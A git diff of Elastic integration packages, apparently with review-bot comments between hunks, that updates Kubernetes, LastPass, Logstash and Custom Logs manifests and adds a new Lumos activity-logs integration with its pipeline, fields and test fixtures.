@@ -1,61 +0,0 @@ -{ - "attributes": { - "columns": [ - "kubernetes.event.type", - "kubernetes.event.reason", - "kubernetes.event.involved_object.kind", - "kubernetes.event.metadata.namespace", - "kubernetes.event.involved_object.name", - "message" - ], - "description": "Kubernetes Events", - "grid": { - "columns": { - "kubernetes.event.involved_object.kind": { - "width": 198.30555555555554 - }, - "kubernetes.event.metadata.namespace": { - "width": 249.83333333333337 - }, - "kubernetes.event.reason": { - "width": 176.33333333333331 - }, - "kubernetes.event.type": { - "width": 156.91666666666663 - } - } - }, - "hideChart": false, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "event.dataset:kubernetes.event" - } - } - }, - "rowHeight": -1, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Kubernetes Events [Metrics Kubernetes]" - }, - "coreMigrationVersion": "8.4.0", - "id": "kubernetes-adc7d0c0-d1fc-11ec-8c69-8bbb7ca8f9ee", - "migrationVersion": { - "search": "8.0.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "type": "search" -} \ No newline at end of file diff --git a/packages/kubernetes/manifest.yml b/packages/kubernetes/manifest.yml index 9e00e5cceb1..e5d02ebbf71 100644 --- a/packages/kubernetes/manifest.yml +++ b/packages/kubernetes/manifest.yml @@ -1,7 +1,7 @@ -format_version: 2.9.0 +format_version: 3.1.2 name: kubernetes title: Kubernetes -version: 1.56.0 +version: 1.58.0 description: Collect logs and metrics from Kubernetes clusters with Elastic Agent. type: integration categories: @@ -9,7 +9,8 @@ categories: - containers - kubernetes conditions: - kibana.version: "^8.12.0" + kibana: + version: "^8.12.0" screenshots: - src: /img/metricbeat_kubernetes_overview.png title: Metricbeat Kubernetes Overview 
@@ -237,3 +238,4 @@ policy_templates: type: image/png owner: github: elastic/obs-cloudnative-monitoring + type: elastic diff --git a/packages/lastpass/changelog.yml b/packages/lastpass/changelog.yml index bc46a171ce5..fe30f4e45d8 100644 --- a/packages/lastpass/changelog.yml +++ b/packages/lastpass/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.15.1" + changes: + - description: Fix page index for event reports. + type: bugfix + link: https://github.com/elastic/integrations/pull/9457 +- version: "1.15.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.14.2" changes: - description: Fix ingest pipeline conditional field handling. diff --git a/packages/lastpass/data_stream/event_report/agent/stream/httpjson.yml.hbs b/packages/lastpass/data_stream/event_report/agent/stream/httpjson.yml.hbs index b4b187d28b8..63eb1e75826 100644 --- a/packages/lastpass/data_stream/event_report/agent/stream/httpjson.yml.hbs +++ b/packages/lastpass/data_stream/event_report/agent/stream/httpjson.yml.hbs @@ -54,7 +54,7 @@ response.split: key_field: id cursor: last_time: - value: '[[if (eq .last_response.page 1)]][[formatDate (parseDate .last_response.body.data.Event1.Time "2006-01-02 15:04:05") "2006-01-02 15:04:05"]][[end]]' + value: '[[if (eq .last_response.page 0)]][[formatDate (parseDate .last_response.body.data.Event1.Time "2006-01-02 15:04:05") "2006-01-02 15:04:05"]][[end]]' tags: {{#if preserve_original_event}} - preserve_original_event diff --git a/packages/lastpass/manifest.yml b/packages/lastpass/manifest.yml index 0983c2a7dd2..7b4c572adc3 100644 --- a/packages/lastpass/manifest.yml +++ b/packages/lastpass/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: lastpass title: LastPass -version: "1.14.2" +version: "1.15.1" description: Collect logs from LastPass with Elastic Agent. type: integration categories: 
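Review bot: The flip from `page 1` to `page 0` in the `last_time` cursor is not explained in the template, and the next reader is likely to "correct" it back; a comment above `last_time` such as `# .last_response.page is zero-based, so the first (newest) report page is 0` would pin the intent. The expression also dereferences `.last_response.body.data.Event1.Time` unconditionally on that page; if a report can come back with no events, the cursor update is left to the template's error handling, which is worth confirming against the LastPass response shape. The enclosing `cursor` block starts outside the hunk.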
@@ -9,7 +9,7 @@ categories: - credential_management conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -56,6 +56,7 @@ policy_templates: title: Provisioning hash description: The API secret is also known as your provisioning hash, and is only displayed once it has been created. required: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/log/changelog.yml b/packages/log/changelog.yml index 6d2f2ce1c1e..7823b3d4d20 100644 --- a/packages/log/changelog.yml +++ b/packages/log/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.3.1" + changes: + - description: Enhance description of custom option + type: enhancement + link: https://github.com/elastic/integrations/pull/9386 - version: "2.3.0" changes: - description: Expose exclude_files option diff --git a/packages/log/manifest.yml b/packages/log/manifest.yml index 5af383a9661..c44f2b6ce44 100644 --- a/packages/log/manifest.yml +++ b/packages/log/manifest.yml @@ -4,7 +4,7 @@ title: Custom Logs description: >- Collect custom logs with Elastic Agent. type: input -version: 2.3.0 +version: 2.3.1 categories: - custom - custom_logs @@ -63,7 +63,7 @@ policy_templates: - name: custom title: Custom configurations description: > - Here YAML configuration options can be used to be added to your configuration. Be careful using this as it might break your configuration file. + Additional settings to be added to the configuration. Be careful using this as it might break the input as those settings are not validated and can override the settings specified above. See [`log` input settings docs](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-log.html) for details. type: yaml default: "" diff --git a/packages/logstash/_dev/build/docs/README.md b/packages/logstash/_dev/build/docs/README.md index 7b28ed0020c..2ca14b916f7 100644 --- a/packages/logstash/_dev/build/docs/README.md 
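Review bot: `secret: true` is added only for the provisioning-hash var in this hunk, while the 1.15.0 changelog entry says "Set sensitive values as secret" (plural); the rest of the vars list, including `proxy_url`, sits outside the hunk, so whether any other credential-bearing var is covered is not visible here. A proxy URL can embed credentials (`user:pass@host`), so if the package treats it as sensitive it would need the same flag. The `kibana.version` bump to `^8.12.0` in the earlier hunk appears tied to this change; a one-line comment next to `secret: true` naming the minimum stack version that honours the flag would save the next maintainer from loosening the constraint.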
+++ b/packages/logstash/_dev/build/docs/README.md @@ -1,6 +1,8 @@ # Logstash -The `logstash` package collects metrics and logs of Logstash. +This integration collects logs and metrics from Logstash instances. + +You can find additional information about monitoring Logstash with the Logstash integration in the **Logstash Reference**: {{ url "logstash-monitoring-ea" "Monitoring Logstash with Elastic Agent" }}. ## Compatibility diff --git a/packages/logstash/_dev/deploy/docker/docker-compose.yml b/packages/logstash/_dev/deploy/docker/docker-compose.yml index 51d81ff21fa..635700be158 100644 --- a/packages/logstash/_dev/deploy/docker/docker-compose.yml +++ b/packages/logstash/_dev/deploy/docker/docker-compose.yml @@ -2,10 +2,20 @@ version: "2.3" services: logstash: user: root - image: "docker.elastic.co/logstash/logstash:${ELASTIC_VERSION:-8.6.0}" + image: "docker.elastic.co/logstash/logstash:${ELASTIC_VERSION:-8.7.0}" + healthcheck: + test: ["CMD", "curl", "-f", "-u", "elastic:changeme", "http://127.0.0.1:9600/"] + retries: 300 + interval: 1s volumes: - "./pipeline:/usr/share/logstash/pipeline" - "./config:/usr/share/logstash/config" - ${SERVICE_LOGS_DIR}:/usr/share/logstash/logs ports: - "127.0.0.1:9600:9600" + logstash_is_ready: + image: tianon/true + platform: linux/amd64 + depends_on: + logstash: + condition: service_healthy diff --git a/packages/logstash/_dev/deploy/variants.yml b/packages/logstash/_dev/deploy/variants.yml index 5b5dafe86f5..f3861a8841d 100644 --- a/packages/logstash/_dev/deploy/variants.yml +++ b/packages/logstash/_dev/deploy/variants.yml @@ -1,4 +1,4 @@ variants: - logstash_8.6.0: - ELASTIC_VERSION: 8.6.0 -default: logstash_8.6.0 + logstash_8.7.0: + ELASTIC_VERSION: 8.7.0 +default: logstash_8.7.0 diff --git a/packages/logstash/changelog.yml b/packages/logstash/changelog.yml index e46311596fe..6775dcdba85 100644 --- a/packages/logstash/changelog.yml +++ b/packages/logstash/changelog.yml 
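Review bot: The healthcheck puts `elastic:changeme` on curl's argv, where it is visible in `docker inspect` and process listings; for a `_dev/deploy` fixture that is acceptable, but it should be labelled as such, e.g. `# fixture-only credentials; must match the API auth configured in ./config`. Whether the Logstash API on 9600 actually requires basic auth depends on the mounted `./config` directory, which this hunk does not show — if it does not, the `-u` flag is dead weight and `curl -f http://127.0.0.1:9600/` is the whole check. `retries: 300` at `interval: 1s` gives a five-minute window, which is generous but consistent with the compose-level gate added via `logstash_is_ready`.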
@@ -1,4 +1,14 @@ # newer versions go on top +- version: "2.4.3" + changes: + - description: Add missing queue.capacity.* mappings + type: bugfix + link: https://github.com/elastic/integrations/pull/9339 +- version: "2.4.2" + changes: + - description: Add link to Logstash monitoring docs + type: enhancement + link: https://github.com/elastic/integrations/pull/9183 - version: "2.4.1" changes: - description: Add missing host.ip field mapping diff --git a/packages/logstash/data_stream/node_stats/fields/fields.yml b/packages/logstash/data_stream/node_stats/fields/fields.yml index 1c23b97818e..b0dde764dc5 100644 --- a/packages/logstash/data_stream/node_stats/fields/fields.yml +++ b/packages/logstash/data_stream/node_stats/fields/fields.yml @@ -182,6 +182,17 @@ type: long - name: max_queue_size_in_bytes type: long + - name: capacity + type: group + fields: + - name: max_queue_size_in_bytes + type: long + - name: max_unread_events + type: long + - name: page_capacity_in_bytes + type: long + - name: queue_size_in_bytes + type: long - name: pipelines.events type: group fields: diff --git a/packages/logstash/docs/README.md b/packages/logstash/docs/README.md index 661dbd7d549..b968d8ad0e1 100644 --- a/packages/logstash/docs/README.md +++ b/packages/logstash/docs/README.md @@ -1,6 +1,8 @@ # Logstash -The `logstash` package collects metrics and logs of Logstash. +This integration collects logs and metrics from Logstash instances. + +You can find additional information about monitoring Logstash with the Logstash integration in the **Logstash Reference**: [Monitoring Logstash with Elastic Agent](https://www.elastic.co/guide/en/logstash/current/monitoring-with-ea.html). ## Compatibility diff --git a/packages/logstash/manifest.yml b/packages/logstash/manifest.yml index 8f6d39b5de3..6368ddcad3d 100644 --- a/packages/logstash/manifest.yml +++ b/packages/logstash/manifest.yml 
@@ -1,6 +1,6 @@ name: logstash title: Logstash -version: 2.4.1 +version: 2.4.3 description: Collect logs and metrics from Logstash with Elastic Agent. type: integration icons: diff --git a/packages/lumos/_dev/build/build.yml b/packages/lumos/_dev/build/build.yml new file mode 100644 index 00000000000..2bfcfc223b0 --- /dev/null +++ b/packages/lumos/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: "git@v8.11.0" diff --git a/packages/lumos/_dev/build/docs/README.md b/packages/lumos/_dev/build/docs/README.md new file mode 100644 index 00000000000..97a3fe4bead --- /dev/null +++ b/packages/lumos/_dev/build/docs/README.md @@ -0,0 +1,31 @@ +# Lumos Integration + +The Lumos integration uses [Lumos' API](https://api.lumos.com/) to retrieve Activity Logs and ingest them into Elasticsearch. This allows you to search, observe, and visualize the Activity Logs through Elasticsearch. + +The Elastic agent running this integration interacts with Lumos' infrastructure using their APIs to retrieve [Activity Logs](https://api.lumos.com/activity_logs) for a Lumos tenant. + +## Configuration + +### Enabling the integration in Elastic + +1. In Kibana go to **Management > Integrations** +2. In the "Search for integrations" search bar type **Lumos**. +3. Click on "Lumos" integration from the search results. +4. Click on **Add Lumos** button to add Lumos integration. + +### Configure Lumos Activity Logs data stream + +1. In Lumos go to **Settings > API Tokens** +2. Click on "Add API Token", enter a name and description +3. Copy the key starting with `lsk_` +4. While adding Lumos integration in Elastic, paste your key into the `API Token` field + +## Logs + +### Activity Logs + +Activity Logs summarize the history of changes and events occurring within Lumos. + +{{fields "activity_logs"}} + +{{event "activity_logs"}} \ No newline at end of file 
diff --git a/packages/lumos/_dev/deploy/docker/docker-compose.yml b/packages/lumos/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..a55e2478878 --- /dev/null +++ b/packages/lumos/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,15 @@ +version: '3.0' +services: + lumos: + image: docker.elastic.co/observability/stream:v0.11.0 + hostname: lumos + ports: + - 8080 + volumes: + - ./files:/files:ro + environment: + PORT: 8080 + command: + - http-server + - --addr=:8080 + - --config=/files/config.yml diff --git a/packages/lumos/_dev/deploy/docker/files/config.yml b/packages/lumos/_dev/deploy/docker/files/config.yml new file mode 100644 index 00000000000..ce71d6fe4a6 --- /dev/null +++ b/packages/lumos/_dev/deploy/docker/files/config.yml @@ -0,0 +1,42 @@ +rules: + - path: /activity_logs + methods: ["GET"] + request_headers: + authorization: Bearer xoxp-1234567890 + responses: + - status_code: 200 + body: |- + { + "items": [ + { + "actor": { + "actor_type": "Lumos user", + "email": "wile.e.coyote@lumos.com", + "family_name": "Wile", + "given_name": "Coyote" + }, + "event_began_at": "2024-03-12T16:09:14", + "event_hash": "630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7", + "event_metadata": {}, + "event_type": "SOD_POLICY_DELETED", + "event_type_user_friendly": "A user deleted a SOD Policy", + "outcome": "Succeeded", + "targets": [ + { + "name": "Untitled Rule", + "target_type": "SOD Policy" + } + ] + } + ], + "limit": 50, + "links": { + "first": "/activity_logs?offset=0", + "last": "/activity_logs?offset=1", + "next": null, + "prev": null, + "self": "/activity_logs" + }, + "offset": 0, + "total": 1 + } diff --git a/packages/lumos/changelog.yml b/packages/lumos/changelog.yml new file mode 100644 index 00000000000..e39cfe34645 --- /dev/null +++ b/packages/lumos/changelog.yml 
@@ -0,0 +1,6 @@ +# newer versions go on top +- version: "0.1.0" + changes: + - description: Initial draft of the package + type: enhancement + link: https://github.com/elastic/integrations/pull/9276 diff --git a/packages/lumos/data_stream/activity_logs/_dev/test/pipeline/test-activity-logs.log b/packages/lumos/data_stream/activity_logs/_dev/test/pipeline/test-activity-logs.log new file mode 100644 index 00000000000..6fdea9e9798 --- /dev/null +++ b/packages/lumos/data_stream/activity_logs/_dev/test/pipeline/test-activity-logs.log @@ -0,0 +1,2 @@ +{"actor":{"actor_type":"Lumos user","email":"wile.e.coyote@lumos.com","family_name":"Wile","given_name":"Coyote"},"event_began_at":"2024-03-12T16:09:14","event_hash":"630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7","event_metadata":{},"event_type":"SOD_POLICY_DELETED","event_type_user_friendly":"A user deleted a SOD Policy","outcome":"Succeeded","targets":[{"name":"Untitled Rule","target_type":"SOD Policy"}]} +{"actor":{"actor_type":"Lumos user","email":"wile.e.coyote@lumos.com","family_name":"Wile","given_name":"Coyote"},"event_began_at":"2024-03-12T16:09:14","event_hash":"630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7","event_metadata":{},"event_type":"SOD_POLICY_DELETED","event_type_user_friendly":"A user deleted a SOD Policy","outcome":"Succeeded","targets":[]} diff --git a/packages/lumos/data_stream/activity_logs/_dev/test/pipeline/test-activity-logs.log-expected.json b/packages/lumos/data_stream/activity_logs/_dev/test/pipeline/test-activity-logs.log-expected.json new file mode 100644 index 00000000000..a4caf105880 --- /dev/null +++ b/packages/lumos/data_stream/activity_logs/_dev/test/pipeline/test-activity-logs.log-expected.json 
@@ -0,0 +1,60 @@ +{ + "expected": [ + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "SOD_POLICY_DELETED", + "id": "630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7", + "outcome": "success", + "type": "info", + "kind": "event" + }, + "lumos": { + "activity_logs": { + "actor": { + "actor_type": "Lumos user", + "email": "wile.e.coyote@lumos.com", + "family_name": "Wile", + "given_name": "Coyote" + }, + "event_began_at": "2024-03-12T16:09:14", + "event_type_user_friendly": "A user deleted a SOD Policy", + "targets": [ + { + "name": "Untitled Rule", + "target_type": "SOD Policy" + } + ] + } + }, + "message": "{\"actor\":{\"actor_type\":\"Lumos user\",\"email\":\"wile.e.coyote@lumos.com\",\"family_name\":\"Wile\",\"given_name\":\"Coyote\"},\"event_began_at\":\"2024-03-12T16:09:14\",\"event_hash\":\"630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7\",\"event_metadata\":{},\"event_type\":\"SOD_POLICY_DELETED\",\"event_type_user_friendly\":\"A user deleted a SOD Policy\",\"outcome\":\"Succeeded\",\"targets\":[{\"name\":\"Untitled Rule\",\"target_type\":\"SOD Policy\"}]}" + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "SOD_POLICY_DELETED", + "id": "630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7", + "outcome": "success", + "type": "info", + "kind": "event" + }, + "lumos": { + "activity_logs": { + "actor": { + "actor_type": "Lumos user", + "email": "wile.e.coyote@lumos.com", + "family_name": "Wile", + "given_name": "Coyote" + }, + "event_began_at": "2024-03-12T16:09:14", + "event_type_user_friendly": "A user deleted a SOD Policy" + } + }, + "message": "{\"actor\":{\"actor_type\":\"Lumos 
user\",\"email\":\"wile.e.coyote@lumos.com\",\"family_name\":\"Wile\",\"given_name\":\"Coyote\"},\"event_began_at\":\"2024-03-12T16:09:14\",\"event_hash\":\"630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7\",\"event_metadata\":{},\"event_type\":\"SOD_POLICY_DELETED\",\"event_type_user_friendly\":\"A user deleted a SOD Policy\",\"outcome\":\"Succeeded\",\"targets\":[]}"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/packages/lumos/data_stream/activity_logs/_dev/test/system/test-default-config.yml b/packages/lumos/data_stream/activity_logs/_dev/test/system/test-default-config.yml
new file mode 100644
index 00000000000..38880e3f5aa
--- /dev/null
+++ b/packages/lumos/data_stream/activity_logs/_dev/test/system/test-default-config.yml
@@ -0,0 +1,9 @@
+input: httpjson
+service: lumos
+vars:
+ api_url: http://{{Hostname}}:{{Port}}
+data_stream:
+ vars:
+ api_token: xoxp-1234567890
+assert:
+ hit_count: 1
diff --git a/packages/lumos/data_stream/activity_logs/agent/stream/httpjson.yml.hbs b/packages/lumos/data_stream/activity_logs/agent/stream/httpjson.yml.hbs
new file mode 100644
index 00000000000..57fffa6cfed
--- /dev/null
+++ b/packages/lumos/data_stream/activity_logs/agent/stream/httpjson.yml.hbs
@@ -0,0 +1,31 @@
+config_version: "2"
+interval: {{interval}}
+request.method: "GET"
+request.url: {{api_url}}/activity_logs
+
+{{#if http_client_timeout}}
+request.timeout: {{http_client_timeout}}
+{{/if}}
+
+request.transforms:
+ - set:
+ target: header.Authorization
+ value: "Bearer {{api_token}}"
+
+response.pagination:
+ - set:
+ target: url.value
+ value: '{{api_url}}[[.last_response.body.links.next]]'
+ fail_on_template_error: true
+
+response.split:
+ target: body.items
+
+cursor:
+ since:
+ value: '[[.last_event.created]]'
+
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
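Review bot: The `cursor.since` value `[[.last_event.created]]` never reaches the request — `request.url` is the bare `{{api_url}}/activity_logs` with no time or offset parameter — so every interval restarts from the first page and re-ingests the full history, and `created` is not a key on the items the mock config earlier on this page returns (they carry `event_began_at`), so the cursor would evaluate to empty anyway. Either drop the `cursor` block or key it on a field that exists, e.g. `value: '[[.last_event.event_began_at]]'`, and add a `request.transforms` entry that passes it as the API's start-time parameter (that parameter's name is not shown on this page). The `initial_interval` variable declared in the data-stream manifest hunk later on this page is also not referenced anywhere in this template. Once `links.next` is null the pagination `set` renders `{{api_url}}` alone, which is not a template error under `fail_on_template_error: true`; confirm httpjson stops there rather than requesting the API root.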
diff --git a/packages/lumos/data_stream/activity_logs/elasticsearch/ingest_pipeline/default.yml b/packages/lumos/data_stream/activity_logs/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..648d7b43563
--- /dev/null
+++ b/packages/lumos/data_stream/activity_logs/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,68 @@
+---
+description: Pipeline for processing Lumos Activity Logs
+processors:
+ - set:
+ field: ecs.version
+ value: 8.11.0
+ - json:
+ field: message
+ target_field: lumos.activity_logs
+ - rename:
+ field: lumos.activity_logs.event_hash
+ target_field: event.id
+ ignore_missing: true
+ - rename:
+ field: lumos.activity_logs.event_type
+ target_field: event.action
+ ignore_missing: true
+ - rename:
+ field: lumos.activity_logs.outcome
+ target_field: event.outcome
+ ignore_missing: true
+ - set:
+ field: event.outcome
+ value: unknown
+ if: (ctx.event.outcome != "Failed") && (ctx.event.outcome != "Succeeded")
+ - set:
+ field: event.outcome
+ value: failure
+ if: ctx.event.outcome == "Failed"
+ - set:
+ field: event.outcome
+ value: success
+ if: ctx.event.outcome == "Succeeded"
+ - set:
+ field: event.kind
+ value: event
+ - set:
+ field: event.type
+ value: info
+ - script:
+ description: Drops null/empty values recursively
+ lang: painless
+ ignore_failure: true
+ source: |
+ boolean drop(Object o) {
+ if (o == null || o == "") {
+ return true;
+ } else if (o instanceof Map) {
+ ((Map) o).values().removeIf(v -> drop(v));
+ return (((Map) o).size() == 0);
+ } else if (o instanceof List) {
+ ((List) o).removeIf(v -> drop(v));
+ return (((List) o).length == 0);
+ }
+ return false;
+ }
+ drop(ctx);
+on_failure:
+ - append:
+ field: error.message
+ value: >-
+ Processor {{{_ingest.on_failure_processor_type}}} with tag
+ {{{_ingest.on_failure_processor_tag}}} in pipeline
+ {{{_ingest.on_failure_pipeline}}} failed with message:
+ {{{_ingest.on_failure_message}}}
+ - set:
+ field: event.kind
+ value: pipeline_error
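Review bot: `lumos.activity_logs.event_began_at` is never parsed, so `@timestamp` stays the ingest time and the `event.created` field that the fields.yml hunk later on this page declares as `date` is never populated; for a security log the activity time belongs in `@timestamp` (or `event.start`) rather than `event.created`, which in ECS is the agent-side creation time. The value in the fixtures (`2024-03-12T16:09:14`) carries no zone offset, so a `date` processor needs an explicit `timezone` instead of inheriting UTC by accident. The raw document is also kept in `message` with no `event.original`/`remove` handling, which departs from the preserve_original_event pattern used elsewhere in this repository — confirm that is intended. A `date` step after the `json` processor, roughly as below, covers the timestamp.

```yaml
  - json:
      field: message
      target_field: lumos.activity_logs
  - date:
      field: lumos.activity_logs.event_began_at
      target_field: "@timestamp"
      formats:
        - ISO8601
      timezone: UTC  # TODO(review): confirm the Lumos API emits UTC; value has no offset
      ignore_failure: true
  # … unchanged: rename / event.outcome / event.kind / script processors …
```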
diff --git a/packages/lumos/data_stream/activity_logs/fields/base-fields.yml b/packages/lumos/data_stream/activity_logs/fields/base-fields.yml
new file mode 100644
index 00000000000..d1d44fd3da9
--- /dev/null
+++ b/packages/lumos/data_stream/activity_logs/fields/base-fields.yml
@@ -0,0 +1,16 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: event.module
+ type: constant_keyword
+ description: Event module
+ value: lumos
+- name: "@timestamp"
+ type: date
+ description: Event timestamp.
diff --git a/packages/lumos/data_stream/activity_logs/fields/ecs.yml b/packages/lumos/data_stream/activity_logs/fields/ecs.yml
new file mode 100644
index 00000000000..553d3da3148
--- /dev/null
+++ b/packages/lumos/data_stream/activity_logs/fields/ecs.yml
@@ -0,0 +1,4 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
diff --git a/packages/lumos/data_stream/activity_logs/fields/fields.yml b/packages/lumos/data_stream/activity_logs/fields/fields.yml
new file mode 100644
index 00000000000..763d709168a
--- /dev/null
+++ b/packages/lumos/data_stream/activity_logs/fields/fields.yml
@@ -0,0 +1,39 @@
+- name: input.type
+ type: keyword
+ description: Input type
+- name: event.id
+ type: keyword
+ description: The event hash
+- name: event.created
+ type: date
+ description: The time the event began
+- name: event.action
+ type: keyword
+ description: The activity that occurred
+- name: event.outcome
+ type: keyword
+ description: The outcome of the event, whether it succeeded or failed
+- name: lumos.activity_logs.actor.actor_type
+ type: keyword
+ description: The type of actor
+- name: lumos.activity_logs.actor.email
+ type: keyword
+ description: The email of the actor
+- name: lumos.activity_logs.actor.family_name
+ type: keyword
+ description: The family name of the actor
+- name: lumos.activity_logs.actor.given_name
+ type: keyword
+ description: The given name of the actor
+- name: lumos.activity_logs.event_type_user_friendly
+ type: keyword
+ description: The user friendly type of the event
+- name: lumos.activity_logs.event_began_at
+ type: keyword
+ description: The time the event began
+- name: lumos.activity_logs.targets
+ type: group
+- name: lumos.activity_logs.targets.target_type
+ type: keyword
+- name: lumos.activity_logs.targets.name
+ type: keyword
diff --git a/packages/lumos/data_stream/activity_logs/manifest.yml b/packages/lumos/data_stream/activity_logs/manifest.yml
new file mode 100644
index 00000000000..8cf49ac76dd
--- /dev/null
+++ b/packages/lumos/data_stream/activity_logs/manifest.yml
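Review bot: `event.id`, `event.created`, `event.action`, `event.outcome` and `input.type` are ECS fields but are declared here with package-local types and descriptions, while the sibling ecs.yml hunk already uses `external: ecs` for `ecs.version` and `message`; declaring them there as `- external: ecs` / `  name: event.id` (and so on) keeps the mapping and the generated README in step with ECS, and `event.created` in particular is defined by ECS as the agent-side creation time, not "the time the event began". `lumos.activity_logs.event_began_at` holds an ISO timestamp but is typed `keyword`, which rules out range queries on it; `type: date` is the better fit. The two `targets.*` leaf fields have no `description`, which is why the README table later on this page shows empty cells for them.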
@@ -0,0 +1,39 @@
+type: logs
+title: Lumos Activity Logs
+streams:
+ - input: httpjson
+ vars:
+ - name: api_token
+ type: password
+ title: API Token
+ description: The API Token used to authenticate with the Lumos API
+ multi: false
+ required: true
+ show_user: true
+ secret: true
+ - name: interval
+ type: text
+ title: Interval
+ multi: false
+ required: true
+ show_user: true
+ description: Interval at which the logs will be pulled. The value must be between 2m and 1h. Supported units for this parameter are h/m/s.
+ default: 1h
+ - name: initial_interval
+ type: text
+ title: Initial Interval
+ multi: false
+ required: true
+ show_user: false
+ description: Initial interval at which the logs will be pulled. Defaults to 24 hours. Supported units for this parameter are h/m/s.
+ default: 24h
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: "Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. \nThis executes in the agent before the logs are parsed. \nSee [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.\n"
+ template_path: httpjson.yml.hbs
+ title: Lumos Activity Logs
+ description: Collect Lumos Activity Logs via the API
diff --git a/packages/lumos/data_stream/activity_logs/sample_event.json b/packages/lumos/data_stream/activity_logs/sample_event.json
new file mode 100644
index 00000000000..3ee0174f430
--- /dev/null
+++ b/packages/lumos/data_stream/activity_logs/sample_event.json
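Review bot: `initial_interval` is `required: true` with a 24h default but nothing consumes it — the httpjson.yml.hbs hunk earlier on this page references only `interval`, `api_url`, `api_token`, `http_client_timeout` and `processors` — so the setting is dead and misleads users into thinking a first-run lookback is honoured; either wire it into the request (a start-time transform on the first run) or delete the variable. The `interval` description says the value must be between 2m and 1h, yet no constraint enforces it and nothing on this page shows where that limit comes from; if it is an API-side limit, cite it in the description, otherwise drop the sentence.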
@@ -0,0 +1,78 @@ +{ + "@timestamp": "2024-03-14T17:53:58.869Z", + "agent": { + "ephemeral_id": "9d0d6b51-1c05-4ab1-ab5c-c16e485d734f", + "id": "f57bb12d-cf67-4ec4-9ed0-52eeb865959e", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "lumos.activity_logs", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "f57bb12d-cf67-4ec4-9ed0-52eeb865959e", + "snapshot": false, + "version": "8.12.1" + }, + "event": { + "action": "SOD_POLICY_DELETED", + "agent_id_status": "verified", + "created": "2024-03-14T17:53:58.869Z", + "dataset": "lumos.activity_logs", + "id": "630b90cedc35a8a5f43361534099bee51e032f42dd442085fc76ef094d228f543c78fbe59c132df992cf71a6b8496504e8ebbc6020fbae1f34206676985412e7", + "ingested": "2024-03-14T17:54:10Z", + "kind": "event", + "outcome": "success", + "type": "info" + }, + "host": { + "architecture": "aarch64", + "containerized": false, + "hostname": "docker-fleet-agent", + "id": "fb3be8e9409740ebb6621b777f0c397d", + "ip": [ + "192.168.144.7" + ], + "mac": [ + "02-42-C0-A8-90-07" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "6.6.12-linuxkit", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.6 LTS (Focal Fossa)" + } + }, + "input": { + "type": "httpjson" + }, + "lumos": { + "activity_logs": { + "actor": { + "actor_type": "Lumos user", + "email": "wile.e.coyote@lumos.com", + "family_name": "Wile", + "given_name": "Coyote" + }, + "event_began_at": "2024-03-12T16:09:14", + "event_type_user_friendly": "A user deleted a SOD Policy", + "targets": [ + { + "name": "Untitled Rule", + "target_type": "SOD Policy" + } + ] + } + }, + "message": "{\"actor\":{\"actor_type\":\"Lumos 
